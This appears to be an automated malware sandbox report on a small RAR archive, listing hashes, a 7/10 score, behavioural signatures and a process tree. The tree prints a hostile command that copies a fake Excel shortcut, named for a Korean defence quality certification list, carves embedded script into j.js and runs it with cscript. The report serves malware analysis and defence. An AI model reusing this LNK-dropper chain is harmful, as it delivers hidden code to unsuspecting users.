Resubmissions
10-06-2024 09:34
240610-lj74fsfh48 710-06-2024 09:30
240610-lgnl2afh27 310-06-2024 09:21
240610-lbl61sfb31 1Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
10-06-2024 09:34
General
-
Target
aaaaa.rar
-
Size
826B
-
MD5
31dc7e890d24acd56f5187edbec4de3f
-
SHA1
6b46555f8f417a7f0b060988e13f9e23efccf9ef
-
SHA256
ae23feb9de28ffad320cc279efbae76aa4a501923eab846b804ec400c3cca0e3
-
SHA512
f3f42a4d2ba6ee0f48079fc2a0cadc8785d3c3b701355ba6476214056e9ba84d490c7106e79e292a558010b5875d269adbbfbaca73935df9945959b57577c716
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\aaaaa.rar1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\aaaaa.rar"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "국방품질경영체제(DQMS)_인증업체_현황_V3.0(1).xlsx.lnk" /B C:\Users\Admin\AppData\Local\Temp\\edg863F8.tmp /y&type C:\Users\Admin\AppData\Local\Temp\\edg863F8.tmp|find "vJgAABhIBFhYoQwAACgdvR" >C:\Users\Admin\AppData\Local\Temp\\j.js&cscript.exe C:\Users\Admin\AppData\Local\Temp\\j.js3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\\edg863F8.tmp"4⤵
-
-
C:\Windows\system32\find.exefind "vJgAABhIBFhYoQwAACgdvR"4⤵
-
-
C:\Windows\system32\cscript.execscript.exe C:\Users\Admin\AppData\Local\Temp\\j.js4⤵
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1312 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD573f5753466c587bc0a195545780aea8f
SHA1cf9254fbd8981f17e06e06ee4b2914c4e6770363
SHA256aa5af6d1864995cc384af3b01593ecd38b29b5a87f3f38bddc4aa2a269fc4d93
SHA512cc214dbeb05df83c83769dd9503a68e7f66b01d101606617f3325158fedc0fbc475eb9f52d7666b264df0273c0bd554442529a3493b308d6c64b140dafaa0421